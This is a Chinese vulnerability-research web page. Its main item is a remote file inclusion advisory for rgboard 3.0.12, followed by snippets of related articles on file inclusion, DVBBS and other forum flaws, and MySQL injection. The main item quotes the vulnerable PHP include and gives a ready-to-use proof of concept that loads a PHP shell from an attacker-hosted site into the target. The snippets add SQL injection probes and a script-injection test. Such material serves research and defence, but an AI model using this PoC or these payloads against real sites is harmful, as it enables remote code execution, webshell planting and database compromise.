rgboard 3.0.12 远程文件包含漏洞_漏洞研究

vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

时间: 2024-10-24 07:07:19

rgboard 3.0.12 远程文件包含漏洞_漏洞研究的相关文章

如何把本地文件包含变为远程文件包含漏洞

本文讲的是如何把本地文件包含变为远程文件包含漏洞, 本地文件包含(LFI)在Web渗透测试中时不时的会遇到,通过加强对LFI渗透测试技术的研究,可以帮助渗透测试人员在未来的渗透测试过程中,识别和测试LFI漏洞. 目前我已经找到了一种将LFI转换为多个Web框架的远程文件包含(RFI)的方法 由于我一直在评估一些开源软件,所以就会发现代码执行的一个方法就是依赖于我选择的驻留在Web服务器上的JAR文件.当以特定方式配置时,Web应用程序将加载JAR文件并在文件中搜索同类文件.有意思的是,在Java

PHP 网络开发详解之远程文件包含漏洞_php技巧

以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能. 复制代码 代码如下: <?php $file_name = $_GET["filename"]; //获得当前文件名 include("$file_name "); //包含文件 //一些其他操作 ?> 这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能.例如,通过在浏览器上访问http://localhost/test.php?filename=myinc

asp下实现替换远程文件为本地文件并保存远程文件的代码_应用技巧

1.将下面的文本文件下载,并将.TXT改为remote.asp,里面有具体设置方法 复制代码 代码如下: <%  '添加资源时是否保存远程图片 Const sSaveFileSelect=True '远程图片保存目录,结尾请不要加"/" Const sSaveFilePath="/images/News" '远程图片保存类型 Const sFileExt="jpg|gif|bmp|png" '////////////////////////

MSIE DHTML Edit跨站脚本漏洞_漏洞研究

微软在去年发布了MSIE DHTML Edit控件跨站脚本漏洞,但是圈内一直没有公布出好用的EXP,害得一帮新手叫苦不迭,别急,这不是为大家送来了大餐吗?!  [受影响系统]   Microsoft Internet Explorer 6.0  - Microsoft Windows XP Professional SP1   - Microsoft Windows XP Professional   - Microsoft Windows XP Home SP1   - Microsoft W

DVBBS7.1 SQL版 跨库漏洞_漏洞研究

漏洞测试环境:DVBBS7.1 SQL  受影响文件  admin/admin.asp  .....  漏洞利用  (select @@version)>0 获得Windows的版本号  and user_name()='dbo' 判断当前系统的连接用户是不是sa  (select user_name())>0 爆当前系统的连接用户  (select db_name())>0 得到当前连接的数据库  (select IS_MEMBER('db_owner')) --查询数据库当前用户权限

研究桃源留言本的漏洞_漏洞研究

桃源留言本是桃源工作室http://www.mytaoyuan.com/开发的一个asp留言系统.由于桃源留言本界面清新,功能强大,简洁适用,所以被一些大大小小的网站所采用,受到许多站长的好评.桃源留言本由原来的2.0版,升级到现在的3.0版.其官方网站也是3.0版.前段时间,我在入侵我们学校的网站的时候,发现了一个部门的网站上有这个留言本.于是引起了我对它的一番研究,我下载了各个版本的源代码,读了部分代码之后,发现漏洞还真不少.      一.上传漏洞     我在网上搜索的时候,发现已经有人

WDB论坛存在多个严重漏洞_漏洞研究

===============================================  仅以此文送给我的好友Bytes,  并祝他和他的女友璐子能够真的相爱一生,白头偕老  ===============================================  前言:  我在和很多网管谈到WEB安全的时候,很多人告诉我WEB安全就是sql injection,"不就是在一个变量后面嵌入你的sql语句么,这个我也会",这是我听到最多的人们对WEB安全的认识,WEB安全

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞_漏洞研究

漏洞发现:LiNZI[B.C.T]@www.cnbct.org  厂商名字:动网先锋论谈  厂商地址:http://www.dvbbs.net/  漏洞程序:Dvbbs 7.1.0  漏洞描述:  Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等.  漏洞利用例子:  一.泄露绝对漏洞测试:  对官方的测试站点:bbs.dvbbs.net  上传一张图,代码如下:  GIF89a  <script>alert(document.c

关于mysql 3.0的注射的一点思路_漏洞研究

mysql 3.0的注射   对mysql的注射主要是靠union 的联合查询,但union只对版本4.0以上的有用,对3.0以下的就没用了..........   所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file   但是也不可以直接使用union替换出来. 下面就是我的一点思路:   得到版本:   mysql> select * from user where userid=1 and length(version())<10;   Emp